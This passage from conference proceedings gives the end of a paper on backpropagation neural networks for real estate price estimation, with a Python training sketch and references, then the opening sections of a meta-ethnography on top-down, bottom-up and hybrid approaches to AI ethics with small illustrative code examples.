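The whole training procedure can be sketched in pure Python as below. Several things here are assumptions rather than details from the text: the bipolar sigmoid is taken in its standard form, the hidden layer size is read as the rounded square root of A · C, the stop criterion is a fixed number of epochs, and the start weights, learning rate and two training patterns are purely illustrative.

```python
import math

def f(net):
    """Assumed bipolar sigmoid 2 / (1 + exp(-net)) - 1, written as tanh(net / 2)."""
    return math.tanh(net / 2.0)

def f_prime(out):
    """Derivative of f, expressed through the neuron output out = f(net)."""
    return 0.5 * (1.0 + out) * (1.0 - out)

def train_pattern(xs, ys, w_ji, w_kj, eta):
    """Run (16)-(29) for one pattern and update both weight matrices in place.

    Returns 0.5 * sum_k (ys_k - o_k)^2 measured before the update.
    """
    # Forward stage
    h = [f(sum(w * x for w, x in zip(row, xs))) for row in w_ji]
    o = [f(sum(w * h_j for w, h_j in zip(row, h))) for row in w_kj]
    # Backward stage: error terms are computed before any weight changes
    delta_k = [(y - o_k) * f_prime(o_k) for y, o_k in zip(ys, o)]
    delta_j = [
        f_prime(h_j) * sum(w_kj[k][j] * delta_k[k] for k in range(len(w_kj)))
        for j, h_j in enumerate(h)
    ]
    for k, row in enumerate(w_kj):
        for j in range(len(row)):
            row[j] += eta * delta_k[k] * h[j]      # hidden-to-output update
    for j, row in enumerate(w_ji):
        for i in range(len(row)):
            row[i] += eta * delta_j[j] * xs[i]     # input-to-hidden update
    return 0.5 * sum((y - o_k) ** 2 for y, o_k in zip(ys, o))

A, C = 2, 1
B = max(1, round(math.sqrt(A * C)))   # assumed reading of the sizing rule
# Fixed small start weights keep the example deterministic;
# random initialisation is the more usual choice.
w_ji = [[0.1 * (i + 1) for i in range(A)] for _ in range(B)]
w_kj = [[0.1 for _ in range(B)] for _ in range(C)]
patterns = [([-1.0, -1.0], [-0.8]), ([1.0, 1.0], [0.8])]  # already scaled

epoch_errors = []
for epoch in range(200):              # stop criterion: fixed number of epochs
    epoch_errors.append(
        sum(train_pattern(xs, ys, w_ji, w_kj, eta=0.2) for xs, ys in patterns)
    )
```

The list `epoch_errors` holds the summed error per epoch, so a threshold on its last value could serve as an alternative stop criterion.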
2.2 Generation of Output Vector by a New Unknown Input Vector
When the neural network is used for pattern recognition or classification, the new input vectors have no associated output vectors. The output vectors are generated by the neural network by performing only the forward-stage calculations. Before that, the input vectors are transformed into the range of the activation function using the scale and shift coefficients obtained from the training patterns. After the outputs are generated, they are transformed back into the initial data interval:
$$y_k = \frac{o_k - \mathit{Shift}_{out}}{\mathit{Scale}_{out}} \tag{30}$$
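The back-transformation in (30) is the inverse of the output scaling in (15). A minimal Python sketch follows; the prices and the network output value are invented for illustration, and `to_original` is a hypothetical helper name.

```python
def to_original(o_k, scale_out, shift_out):
    """Invert the output scaling, as in (30)."""
    return (o_k - shift_out) / scale_out

# Illustrative training prices, used only to derive the scale and shift.
prices = [50000.0, 120000.0, 200000.0]
scale_out = 2.0 / (max(prices) - min(prices))   # R_norm = 2 for [-1, 1]
shift_out = -1.0 - min(prices) * scale_out

network_output = 0.25                           # hypothetical value of o_k
estimated_price = to_original(network_output, scale_out, shift_out)
# estimated_price is approximately 143750.0
```

An output of −1 maps back to the lowest training price and an output of 1 to the highest, so estimates always fall within the price range seen during training.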
3 Software Realization
The proposed approach is work in progress, and a prototype system has been implemented, as shown in Fig. 3.
Fig. 3. The prototype software system.
The training examples are given as numerical input and output vectors (Fig. 4). After the training data are loaded, the system settings should be configured and the training performed.
Fig. 4. Training examples.
When the training finishes, new input data are presented that consist only of input vectors – Fig. 5.
Fig. 5. New input data.
The trained neural network generates new output data, shown in Fig. 6, representing the real estate price that should be transformed back to the original values according to (30).
Fig. 6. Generated output data.
4 Conclusion
Some characteristics of real estate cannot be assessed with a numerical value, for example the disposition of rooms, the importance of room sizes, etc. That is why some such criteria can be fixed by the customers. To realize such an approach, clustering can be done according to the similarity of the criterion, and a separate neural network model can be trained for every cluster. Thus a local approach can be used that separates the whole space of examples into subspaces. Another modification of the training algorithm is to give more importance to some training examples. Taking into account the priority $\tau_m$ of training example m, the error function of output k is:
$$\varepsilon_{km} = \frac{1}{2}\,\tau_m \,(ys_k - o_k)^2 \tag{31}$$
In this case the priority is a constant. Thus the error term in the output is
$$\frac{\partial \varepsilon_{km}}{\partial w_{kj}} = \frac{\partial \left[\tau_m \frac{1}{2}(ys_k - o_k)^2\right]}{\partial w_{kj}} = \tau_m \, \frac{\partial \left[\frac{1}{2}(ys_k - o_k)^2\right]}{\partial w_{kj}} \tag{32}$$
As a consequence
$$\delta_{km} = \tau_m \, \delta_k \tag{33}$$
$$\Delta w_{kj} = \eta \, \delta_{km} \, h_j = \eta \, \tau_m \, \delta_k \, h_j \tag{34}$$
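The effect of the priority on the output-layer update can be sketched as follows. The sketch assumes the standard bipolar sigmoid derivative and uses invented values; `weighted_output_update` is a hypothetical helper, not part of the prototype.

```python
def weighted_output_update(ys_k, o_k, h, tau_m, eta):
    """Weight changes for one output neuron, scaled by the example priority tau_m."""
    f_prime = 0.5 * (1.0 + o_k) * (1.0 - o_k)   # assumed bipolar sigmoid derivative
    delta_k = (ys_k - o_k) * f_prime            # unweighted error term
    delta_km = tau_m * delta_k                  # priority-weighted error term
    return [eta * delta_km * h_j for h_j in h]

h = [0.2, -0.4]   # illustrative hidden outputs
plain = weighted_output_update(0.5, 0.1, h, tau_m=1.0, eta=0.1)
urgent = weighted_output_update(0.5, 0.1, h, tau_m=3.0, eta=0.1)
# Each entry of `urgent` is three times the matching entry of `plain`.
```

In this form the priority acts like a per-example learning rate: an example with priority 3 moves the weights three times as far as the same example with priority 1.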
Finally, as some neural network connections are not significant, they can be removed. In this way some factors become more important than others during the estimation stage.
Acknowledgment. The research whose results are presented in this publication was carried out under project NP3 “Research of models for management of processes for effective transition to an economy, based on 6G networks” within the framework of the scientific activity at Technical University of Varna, financed by the state budget.
References
1. Du, K.-L., Swamy, M.N.S.: Neural Networks in a Softcomputing Framework. Springer (2006)
2. Fausett, L.: Fundamentals of Neural Networks: Architectures, Algorithms, and Applications. Prentice-Hall (1994). ISBN 0-13-334186-0
3. Hecht-Nielsen, R.: Theory of the backpropagation neural network. In: Neural Networks for Perception (Vol. 2): Computation, Learning, Architectures, pp. 65–93. Harcourt Brace & Co. (1992). ISBN 0-12-741252-2
4. Tarassenko, L.: A Guide to Neural Computing Applications. Elsevier (2004)
5. Zurada, J.: Introduction to Artificial Neural Systems. West Publishing Co., St. Paul, MN (1992)
6. Kasabov, N.K.: Foundations of Neural Networks, Fuzzy Systems, and Knowledge Engineering. The MIT Press (1998). ISBN-10: 0-262-11212-4, ISBN-13: 978-0-262-11212-3
7. Galushkin, A.I.: Neural Networks Theory. Springer (2007). ISBN 978-3-540-48124-9
8. Touretzky, D.S.: 15-486/782: Artificial Neural Networks, Lectures, Carnegie Mellon University, Fall (2006). http://www.cs.cmu.edu/afs/cs.cmu.edu/academic/class/15782-f06/syllabus.html
9. Nisheva, M., Shishkov, D.: Artificial Intelligence. Integral (1995). ISBN 954-8643-11
10. Kermanshahi, B.: Recurrent neural network for forecasting next 10 years loads of nine Japanese utilities. Neurocomputing 23(1), 125–133 (1998)
Contextualizing Artificially Intelligent Morality: A Meta-ethnography of Theoretical, Political and Applied Ethics
Jennafer Shae Roberts and Laura N. Montoya
Accel AI Institute, San Francisco, CA, USA
[email protected]
http://www.accel.ai
Abstract. In this meta-ethnography, we explore three different angles of ethical artificial intelligence (AI) design implementation including the philosophical ethical viewpoint, the technical perspective, and framing through a political lens. Our qualitative research includes a literature review which highlights the cross referencing of these angles through discussing the value and drawbacks of contrastive top-down, bottom-up, and hybrid approaches previously published. The novel contribution to this framework is the political angle, which constitutes ethics in AI either being determined by corporations and governments and imposed through policies or law (coming from the top), or ethics being called for by the people (coming from the bottom), as well as top-down, bottom-up, and hybrid technicalities of how AI is developed within a moral construct and in consideration of its users, with expected and unexpected consequences and long-term impact in the world. There is a focus on reinforcement learning as an example of a bottom-up applied technical approach and AI ethics principles as a practical top-down approach. This investigation includes real-world case studies to impart a global perspective, as well as philosophical debate on the ethics of AI and theoretical future thought experimentation based on historical fact, current world circumstances, and possible ensuing realities. Keywords: Artificial intelligence · Ethics · Reinforcement learning · Politics
1 Introduction
As a meta-ethnography, this paper will take an anthropological approach to the culture and development of artificial intelligence (AI) ethics and practices. This is in no way exhaustive; however, it will magnify some of the key angles and tensions in the ethical AI field. We will be using the previously published [5, 31] framework of top-down and bottom-up ethics in AI and examining what this means in three different contexts: theoretical, technical, and political. Strategies for artificial morality have been discussed in top-down, bottom-up and hybrid frameworks in order to create a foundation for
© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 482–501, 2023. https://doi.org/10.1007/978-3-031-28073-3_35
philosophical and technical reflections on AI system development [5, 31]. Although there can be distinctions made between ethics and morality, we use the terms interchangeably. Top-down ethics in AI can be described as a rule-based system of ethics. These can come from philosophical moral theories (theoretical perspective), from top-down programming (technical perspective) [5], or from principles designated by authorities (political perspective). Bottom-up ethics in AI contrasts with top-down approaches and works without overarching rules. Bottom-up ethics in AI can come from learned experiences (theoretical perspective), from machine learning and reinforcement learning (technical perspective) [5], or from everyday people and users of technology calling for ethics (political perspective). Hybrid versions of top-down and bottom-up methods are a mixture of the two, or else somewhere in the middle, and can have various outcomes. The conclusions from this analysis show that ethics around AI is complex, and especially when deployed globally, its implementation needs to be considered from multiple angles: there is no one correct way to make AI that is ethical. Rather, care must be taken at every turn to right the wrongs of society through the application of AI ethics, which could create a new way of looking at what ethics means in our current digital age. This paper contextualizes top-down and bottom-up ethics in AI through analyzing theoretical, technical, and political implementations. Section 2 includes a literature review which states our research contributions and how we have built on existing research, as well as an outline of the framework utilized throughout. In Sect.
3, the first angle of the framework described is the theoretical moral ethics viewpoint: Ethics can formulate from the top-down, coming from rules and philosophies, or bottom-up which mirrors the behaviors of people and what is socially acceptable for individuals as well as groups, varying greatly by culture. Section 3.1 gives an example of fairness as a measure of the complexity of theoretical ethics in applied AI. Section 4 regards the technical perspective, which is exemplified by programming from the top and applied machine learning from the bottom: Essentially how to think about implementing algorithmic policies with balanced data that will lead to fair and desirable outcomes. Section 5 will examine the angle of top-down ethics dictated from the powers that be, and bottom-up ethics derived from the demands of the people: We will call this the political perspective. In Sect. 6, we will connect the perspectives all back together and reintegrate these concepts whilst we examine how they intertwine by first looking at the bottom-up method of AI being taught ethics using the example of reinforcement learning in Sect. 6.1. Section 7 combines perspectives from the top-down and illustrates this with Sect. 7.1 that provides examples of principles of AI ethics. An understanding of hybrid ethics in AI which incorporates top-down and bottom-up methods is included in Sect. 8, followed by case studies on data mining in Africa (Sect. 8.1) and the varying efficiency of contact tracing apps for COVID-19 in Korea and Brazil (Sect. 8.2). Following is a discussion in Sect. 9, and finally the paper’s conclusion in Sect. 10. This is an exercise in exploration to reach a deeper understanding of morality around AI. How ethics for AI works in reality is a blend of all of these theories and ideas acting on and in conjunction with one another. 
The aim of this qualitative analysis is to provide a framework to understand and think critically about AI ethics, and our hope is that this will influence the development of ethical AI in the future.
2 Literature Review
The purpose of this paper is to deepen the understanding of the development of ethics in AI by cross-referencing a political perspective into the framework of top-down, bottom-up and hybrid approaches, which previously covered only theoretical and technical angles [5]. Adding the third, political perspective fills some of the gaps that were left by viewing AI ethics only theoretically and technically. The political perspective allows for an understanding of where the influence of power affects ethics in AI. Issues of power imbalances are often systemic, and systems of oppression can now be replicated without oversight with the use of AI, as it learns this from past human behaviour, such as favoring white faces and names in algorithms that are used for hiring and loans [17]. Furthermore, it is important not to ignore the fact that AI serves to increase wealth and power for large corporations and governments who have the most political influence [32]. While the influence of politics on the development of AI ethics has been described previously, it has never been discussed in comparison with the technical and theoretical lenses while also utilizing the top-down, bottom-up, and hybrid frameworks for development. By engaging with and expanding on the framework of top-down, bottom-up and hybrid ethics in AI, we can gain a deeper understanding of how ethics could be applied to technology. There has been debate about whether ethical AI is even possible [21], and it is not only due to programming restrictions but to the fact that AI exists in an unethical world which values wealth and power for the people already in power above all else [21]. This is why the political perspective is so vital to this discussion. By political, we do not refer to any particular political parties or sides, but rather to a way of talking about power, both corporate and government.
As defined in the Merriam-Webster dictionary, political affairs or business refer to ‘competition between competing interest groups or individuals for power and leadership (as in a government)’ [18]. The articles we chose to include in this literature review paint a picture of the trends in AI ethics development in the past two decades. Table 1 features a list of primary research contributions and which frameworks they discuss. The first mention of the framework we use to talk about ethics in AI from the top-down, bottom-up and a mix of the two (hybrid) originated with Allen, Smit and Wallach in 2005 [5]. The same authors penned a second article on this framework for machine morality in 2008 [31]. The authors described two different angles of approaching AI morality as being the theoretical angle and the technical angle (but not the political angle). In 2017, an article [13] explored humanity’s ethics and their influence on AI ethics, for better or worse. Although the authors did not acknowledge politics or power directly, they did discuss the difference between legality and personal ethics. Next we see a great deal of focus on AI principles, as exemplified by the work of Whittlestone et al. in 2019 [32], which also discusses political tensions and other ethical tensions in principles of AI ethics outright. This is important as it questions where the power is situated, which is a central tenet of our addition to this area of research. These papers, which describe the political lens and tensions of power and political influence, are lacking in the framework of top-down, bottom-up, and hybrid ethical AI implementations.
Table 1. Literature contributions including frameworks cross-referenced

Authors and year | Contribution | Frameworks cross-referenced
Allen, Smit, & Wallach (2005) | First paper to use top-down/bottom-up/hybrid framework for describing artificial morality | Theoretical and technical perspectives alongside the top-down, bottom-up, and hybrid framework
Wallach, Allen, & Smit (2008) | Values and limitations of top-down imposition and bottom-up building of ethics in AI | Theoretical and technical perspectives alongside the top-down, bottom-up approaches
Etzioni & Etzioni (2017) | Ethical choices of humans over millennia as a factor in building ethical AI | Technical applied development, and political perspectives described but without the top-down, bottom-up framework
Whittlestone, Nyrup, Alexandrova, & Cave (2019) | Tensions within principles of AI ethics | Theoretical and political lens for ethical AI development without the technical perspective and without mention of the top-down, bottom-up, and hybrid development framework
Phan, Goldenfein, Mann, & Kuch (2021) | Questions the ethics of Big Tech taking responsibility and addresses ethical crises | Political lens for ethical AI development without the technical or theoretical perspectives and without mention of the top-down, bottom-up, and hybrid development framework
Our methodology utilizes the top-down, bottom-up, and hybrid framework for the development of AI ethics and cross-references it with the technical, theoretical, and political lenses which we will explore more deeply in the following sections. Table 2 lists these cross-references in simplified terms for the reader.
Table 2. Framework for contextualizing AI ethics

Approach | Top-down | Bottom-up | Hybrid
Technical | Programmed rules. Ex: Chatbot | Machine learning. Ex: Reinforcement learning | Has a base of rules or instructions, but then also is fed data to learn from as it goes. Ex: Autonomous vehicles employ some rule-based ethics, while also learning from other drivers and road experience
Theoretical | Rule-utilitarianism and deontological ethics, principles, i.e. fairness. Ex: consequentialist ethics, Kant’s moral imperative and other duty based theories | Experience-based, case-based reasoning. Ex: learn as you go from real-world consequences | Personal moral matrix combining rules and learned experience. Ex: having some rules but also developing ethics through experiences
Political | Corporate and political powers. Ex: corporate control over what is ethical for the company | People power. Ex: groups online of individuals calling for ethics in AI | A combination of ethics from those in power who take into account ethics called for by the people. Ex: employees collaborating with their corporation on ethical AI issues
3 Theoretical AI Morality: Top-Down vs Bottom-Up
The first area to consider is ethics from a theoretical moral perspective. The primary point to mention in this part of the analysis is that ethics has historically been made for people, and people are complex in how they understand and apply ethics, especially top-down ethics. At an introductory glance, “top-down” ethical theories amount to rule-utilitarianism and deontological ethics, where “bottom-up” refers to case-based reasoning [30]. Theoretical ethics from a top-down perspective includes examples such as the Golden Rule, the Ten Commandments, consequentialist or utilitarian ethics, Kant’s moral imperative and other duty based theories, Aristotle’s virtues, and Asimov’s laws of robotics. These come from a wide range of perspectives, including literature, philosophy, and religion [31]. Most of these collections of top-down ethical principles are made solely for humans. The one exception on this list that does not apply to people is of course Asimov’s laws of robotics, which are applied precisely to AI. However, Asimov himself said that they were flawed. Asimov used storytelling to demonstrate that his three laws, plus the ‘zeroth’ law added in 1985, had problems of prioritization and potential deadlock. He showed that ultimately, the laws would not work, despite the surface-level appearance of putting
Contextualizing Artificially Intelligent Morality
humanity’s interest above that of the individual. This has been echoed by other theorists with regard to any rule-based system implemented for ethical AI. Asimov’s rules of robotics seemingly encapsulate a wide array of ethical concerns, giving the impression of being intuitive and straightforward. However, in each of his stories, we can see how they fail time after time [5]. Much of science fiction does not predict the future as much as warn us against its possibilities.
The top-down rule-based approach to ethics presents different challenges for AI than it does in systems that originated for humans. As humans, we learn ethics as we go, from observation of our families and community, including how we react to our environment and how others react to us. Etzioni and Etzioni [13] made the case that humans first acquire moral values from those who raise them, although it can be argued that individuals make decisions based on their chosen philosophies. As people are exposed to various inputs from new groups, cultures and subcultures, they modify their core value systems, gradually developing their own personal moral matrix [13]. This personal moral mix could be thought of as a hybrid model of ethics for humans.
The question is, how easy and practical is it to take human ethics and apply them to machines? Some would say it is impossible to teach AI right and wrong, if we could even come to an agreement on how to define those terms in the first place. Researchers have stressed the importance of differences in the details of ethical systems across cultures and between individuals, even though shared values exist that transcend cultural differences [5]. There simply is not one set of ethical rules that will be inclusive for everyone.
3.1 The Example of Fairness in AI
Many of the common systems of values that experts agree need to be considered in AI include fairness, or to take it further, justice. We will work with this concept as an example.
We have never had a fair and just world, so to teach an AI to be fair and just does not seem possible. But what if it was? We get into gray areas when we imagine the open-ended potential future of AI. Imagining it could actually improve the state of the world, as opposed to imagining how it could lead to further destruction of humanity could be what propels us in a more positive direction. Artificial intelligence should be fair. The first step is to agree on what a word like fairness means when designing AI. Many people pose the question: Fairness for whom? Then there is the question of how to teach fairness to AI. AI systems as we know are machines. Machines are good at math. Mathematical fairness and social fairness are two very different things. How can this be codified? Can an equation which solves or tests for fairness between people be developed? Most AI is built to solve problems of convenience and to automate tedious or monotonous tasks in order to free up our time and make more money. There is a disconnect between what Allen et al. [5] refer to as the spiritual worldviews from which much of our ethical understanding originates, and the materialistic worldview of computers and robots, which is not completely compatible. It can be seen every day in the algorithms that discriminate and codify what retailers think we are most likely to consume. For example, in the ads they show us as we scroll, we often see elements that don’t align with our values but rather appeal to our habits of consumption. At the core level, these values are twisted to benefit the current capitalistic
J. S. Roberts and L. N. Montoya
systems and have little to do with actually improving our lives. We cannot expect AI to jump from corporate materialism to social justice, or reach a level of fairness, simply by tweaking the algorithms. Teaching ethics to AI is extremely challenging, if not impossible, on multiple fronts. In order to have ethical AI we need to first evaluate our own ethics. Douglas Rushkoff, well-known media theorist, author and Professor of Media at City University of New York, wrote: “…the reason why I think AI won’t be developed ethically is because AI is being developed by companies looking to make money – not to improve the human condition… My concern is that even the ethical people still think in terms of using technology on human beings instead of the other way around. So, we may develop a ‘humane’ AI, but what does that mean? It extracts value from us in the most ‘humane’ way possible?” [23]. This is a major consideration for AI ethics, and the realities of capitalism don’t align with ethics and virtues such as fairness. One of the biggest questions when considering ethics for AI is how to implement something so complex and philosophical into machines that are contrastingly good at precision. Some say this is impossible. “Ethics is not a technical enterprise, there are no calculations or rules of thumb that we could rely on to be ethical. Strictly speaking, an ethical algorithm is a contradiction in terms.” (Vachnadze, 2021) [29]. We turn next to the possibilities for technical application of AI morality.
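The contrast drawn in Sect. 3.1 between mathematical and social fairness can be made concrete with a small sketch. It is not taken from the cited works: the two metrics used here (a demographic parity gap and an equal opportunity gap) are common formalizations that we assume for illustration, and the groups and records are hypothetical toy data. The point is only that a single set of decisions can look perfectly fair under one equation and unfair under another.

```python
from typing import Dict, List, Tuple

# Each record is (true_label, predicted_label); 1 means "qualified" / "selected".
Records = List[Tuple[int, int]]


def selection_rate(records: Records) -> float:
    """Share of people the model selects, regardless of their true label."""
    return sum(pred for _, pred in records) / len(records)


def true_positive_rate(records: Records) -> float:
    """Share of truly qualified people the model selects."""
    qualified = [pred for label, pred in records if label == 1]
    return sum(qualified) / len(qualified)


# Hypothetical toy data, invented for illustration only.
groups: Dict[str, Records] = {
    "A": [(1, 1), (1, 1), (0, 0), (0, 0)],
    "B": [(1, 1), (1, 1), (1, 0), (0, 0)],
}

# Demographic parity compares how often each group is selected.
parity_gap = abs(selection_rate(groups["A"]) - selection_rate(groups["B"]))
# Equal opportunity compares how often qualified members of each group are selected.
opportunity_gap = abs(
    true_positive_rate(groups["A"]) - true_positive_rate(groups["B"])
)

print(f"demographic parity gap: {parity_gap:.2f}")
print(f"equal opportunity gap:  {opportunity_gap:.2f}")
```

Both groups are selected at the same rate, so the first gap is zero, yet a qualified member of group B is overlooked, so the second gap is not. Which of the two counts as “fair” is exactly the social question that the mathematics cannot settle.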
4 Technical AI Morality: Top-Down vs Bottom-Up
One way to think about top-down AI from the technical perspective, as noted by Eckart [11], is to think of it as a decision tree, often implemented in the form of a call center chat bot. The chat bot guides the user through a defined set of options depending on the answers inputted. Eckart continues by describing bottom-up AI as what we typically think of when we hear artificial intelligence: utilizing machine learning and deep learning. As an example, we can think about the AI utilized for diagnostic systems in healthcare and self-driving cars. These bottom-up systems can learn automatically without explicit programming from the start [11].
Top-down systems of learning can be very useful for some tasks that machines can be programmed to do, like the chat bot example above. However, if they are not monitored, they could make mistakes, and it is up to us as people to catch those mistakes and correct them, which is not always possible with black boxes in effect. There may also be a lack of exposure to sufficient data to make a decision or prediction in order to solve a problem, leading to system failure. Here is the value of having a ‘human in the loop’. This gets complicated even further when we move into attempting to program the more theoretical concepts of ethics.
Bottom-up from the technical perspective, which will be described in depth below, follows the definition of machine learning. The system is given data to learn from, and it uses that information from the past to predict and make decisions for the future. This can work quite well for many tasks. This approach can also have a lot of flaws built in, because the world that it learns from is flawed. We can look at the classic example of harmful biases being learned and propagated through a system, for instance in who gets a job or a loan, because the data from the past reflects biased systems in our society [17].
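The two technical styles described above can be sketched side by side. This is a minimal illustration under our own assumptions, not Eckart’s implementation: the decision tree, its node names, the loan history, and the 0.5 cut-off are all hypothetical. The top-down function can only follow paths someone wrote by hand, while the bottom-up function derives its behavior from past decisions and therefore reproduces whatever bias those decisions contain.

```python
from collections import defaultdict
from typing import Dict, List, Tuple

# Top-down: every path is written by hand (hypothetical call-center script).
DECISION_TREE: Dict[str, Dict[str, str]] = {
    "start": {"billing": "billing", "technical": "technical"},
    "billing": {"refund": "open_refund_ticket", "invoice": "resend_invoice"},
    "technical": {"login": "reset_password", "other": "escalate_to_human"},
}


def follow_script(answers: List[str]) -> str:
    """Walk the hand-written tree; unknown answers are escalated to a human."""
    node = "start"
    for answer in answers:
        node = DECISION_TREE.get(node, {}).get(answer, "escalate_to_human")
        if node not in DECISION_TREE:
            break  # reached an outcome rather than another question
    return node


# Bottom-up: behavior is estimated from past decisions instead of being written.
def learn_approval_rates(history: List[Tuple[str, bool]]) -> Dict[str, float]:
    """Estimate, per group, how often past applicants were approved."""
    counts = defaultdict(lambda: [0, 0])  # group -> [approved, total]
    for group, approved in history:
        counts[group][0] += int(approved)
        counts[group][1] += 1
    return {group: a / t for group, (a, t) in counts.items()}


def predict_approval(rates: Dict[str, float], group: str) -> bool:
    """Approve when the group was approved at least half the time in the past."""
    return rates[group] >= 0.5


# Hypothetical, deliberately biased loan history.
history = (
    [("A", True)] * 8 + [("A", False)] * 2
    + [("B", True)] * 3 + [("B", False)] * 7
)
rates = learn_approval_rates(history)

print(follow_script(["billing", "refund"]))
print(follow_script(["billing", "cancel"]))
print(predict_approval(rates, "A"), predict_approval(rates, "B"))
```

The scripted bot hands an unanticipated answer to a person, which is one simple form of keeping a human in the loop. The learned predictor has no such stop: it turns a historical disparity between groups A and B into a rule for the future.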
Technical top-down and bottom-up ethics in AI primarily concerns how AI learns ethics. Machines don’t learn like people do. They learn from the data that is fed to them, and they are very good at certain narrow tasks, such as memorization or data collection. However, AI systems can fall short in areas such as objective reasoning, which is at the core of ethics. Whether coming from the top-down or bottom-up, the underlying concern is that teaching ethics to AI is extremely difficult, both technically and socially. Ethics and morality prove difficult to come to an actual consensus on. We live in a very polarized world. What is fair to some will undoubtedly be unfair to others. There are several hurdles to overcome. Wallach et al. [31] describe three specific challenges to address in this matter, paraphrased below:
1. Scientists must break down moral decision making into its component parts, which presents an engineering task of building autonomous systems in order to safeguard basic human values.
2. Which decisions can and cannot be codified and managed by mechanical systems needs to be recognized.
3. Designing effective and cognitive systems which are capable of managing ambiguity and conflicting perspectives needs to be learned [31].
Here we will include the use of a hybrid model of top-down and bottom-up ethics for AI that has a base of rules or instructions, but then also is fed data to learn from as it goes. This method claims to be the best of both worlds, and covers some of the shortcomings of both top-down and bottom-up models. For instance, self-driving cars can be programmed with laws and rules of the road, and also can learn from observing human drivers. In the next section we will explore more of the political angle of this debate.
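The hybrid idea in the self-driving example above can be sketched as a learned preference layer filtered by a hand-written rule layer. This is an illustrative toy under our own assumptions, not a description of any real vehicle system: the situations, actions, forbidden sets, and observation counts are all hypothetical.

```python
from collections import Counter
from typing import Dict, List, Set, Tuple

# Top-down layer: hard rules of the road (hypothetical).
FORBIDDEN: Dict[str, Set[str]] = {
    "stop_sign": {"roll_through", "accelerate"},
    "red_light": {"roll_through", "accelerate"},
}


def learn_preferences(
    observations: List[Tuple[str, str]]
) -> Dict[str, Counter]:
    """Bottom-up layer: count what observed human drivers did per situation."""
    prefs: Dict[str, Counter] = {}
    for situation, action in observations:
        prefs.setdefault(situation, Counter())[action] += 1
    return prefs


def choose_action(
    prefs: Dict[str, Counter], situation: str, fallback: str = "full_stop"
) -> str:
    """Pick the most frequently observed action that the rules allow."""
    banned = FORBIDDEN.get(situation, set())
    for action, _count in prefs.get(situation, Counter()).most_common():
        if action not in banned:
            return action
    return fallback  # nothing learned, or everything learned is forbidden


# Hypothetical observations: most drivers roll through the stop sign.
observations = (
    [("stop_sign", "roll_through")] * 6
    + [("stop_sign", "full_stop")] * 4
    + [("open_road", "cruise")] * 5
)
prefs = learn_preferences(observations)

print(choose_action(prefs, "stop_sign"))
print(choose_action(prefs, "open_road"))
print(choose_action(prefs, "red_light"))
```

A purely bottom-up learner would copy the majority and roll through the stop sign. The rule layer vetoes that, and the system falls back to the most common legal behavior. The design leaves open the harder question raised in this section: who writes the forbidden list, and on whose values.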
5 Political AI Morality: Top-Down vs. Bottom-Up
We use the term political to talk about where the power and decision making is coming from, which then has an effect that radiates outward and influences systems, programmers, and users alike. As an example of top-down from a political perspective, this paper will largely concern itself with principles of ethics in AI, often stated by corporations and organizations. Bottom-up ethics in AI from a political standpoint concerns the perspectives of individuals and groups who are not in positions of power, yet still need a voice. The Asilomar AI Principles [3] are an example of a top-down model and have their critiques. This is a comprehensive list of rules that was put out by the powers that be in tech and AI, with the hopes of offering guidelines for developing ethics in AI. Published in 2017, this is one key example of top-down ethics from the officials including 1,797 AI/Robotics Researchers and 3,923 other Endorsers affiliated with the Future of Life Institute. These principles outline ethics and values that the use of AI must respect, provide guidelines on how research should be conducted, and offer important considerations for thinking about long-term issues [3]. Congruently, another set of seven principles for Algorithmic Transparency and Accountability were published by the US
Association for Computing Machinery (ACM) which addressed a narrower but closely related set of issues [32]. Since then we have seen an explosion of lists of principles for AI ethics. A deeper discussion of principles can be found in Sect. 7.1 of this paper. The bottom-up side of the political perspective is not as prevalent but could look like crowd-collected considerations about ethics in AI, such as from employees at a company, students on a campus, or online communities. The key feature of bottom-up ethics from a political perspective is determination by everyday people, mainly the users of the technology. MIT’s Moral Machine (which collected data from millions of people on their decisions in a game-like program to assess what a self-driving vehicle should do in life or death situations) is one example of this [6]. However, it still has top-down implications such as obeying traffic laws imposed by municipalities. A pure bottom-up community-driven ethics initiative could include guidelines, checklists, and case studies specific to the ethical challenges of crowdsourced tasks [26]. Even when utilizing bottom-up “crowdsourcing” and employing the moral determination of the majority, these systems often fail to serve minority participants. In a roundtable discussion from the Open Data Initiative (ODI) [1], participants found that marginalized communities have a unique placement for understanding and identifying the contradictions and tensions of the systems we all operate in. Their unique perspectives could be leveraged to create change. If a system works for the majority, which is often the goal, it may be invisibly dysfunctional for people outside of the majority. This insight is invaluable to alleviate ingrained biases. There is an assumption that bottom-up data institutions will represent everyone in society and always be benign. Alternatively, there is a counter-argument that their narrow focus leads to niche datasets and lacks applicability to societal values.
In the best light, bottom-up data institutions are viewed as revolutionary mechanisms that could rebalance power between big tech companies and communities [1]. An important point to keep in mind when thinking about bottom-up ethics is that there will always be different ideals coming from different groups of people, and the details of the applications are where the disagreements abound.
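The concern that majority-driven crowdsourcing can be invisibly dysfunctional for people outside the majority can be shown with simple arithmetic. The sketch below is our own illustration with hypothetical groups, options, and vote counts. It is not drawn from the Moral Machine data or the ODI roundtable.

```python
from collections import Counter
from typing import Dict, List, Tuple

# Hypothetical crowdsourced responses: (group, preferred_option).
responses: List[Tuple[str, str]] = (
    [("majority", "option_x")] * 80
    + [("minority", "option_y")] * 18
    + [("minority", "option_x")] * 2
)


def winning_option(votes: List[Tuple[str, str]]) -> str:
    """Return the option chosen by the largest number of respondents."""
    return Counter(choice for _, choice in votes).most_common(1)[0][0]


def satisfaction_by_group(
    votes: List[Tuple[str, str]], winner: str
) -> Dict[str, float]:
    """Share of each group whose own preference matches the winning option."""
    totals: Counter = Counter()
    satisfied: Counter = Counter()
    for group, choice in votes:
        totals[group] += 1
        satisfied[group] += int(choice == winner)
    return {group: satisfied[group] / totals[group] for group in totals}


winner = winning_option(responses)
overall = sum(choice == winner for _, choice in responses) / len(responses)
per_group = satisfaction_by_group(responses, winner)

print(winner, overall)
print(per_group)
```

The aggregate figure suggests broad agreement, while the per-group breakdown shows that most of the smaller group preferred something else. Reporting only the aggregate is one way a system that “works for the majority” hides its failure for everyone else.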
6 The Bottom-Up Method of AI Being Taught Ethics Through Reinforcement Learning
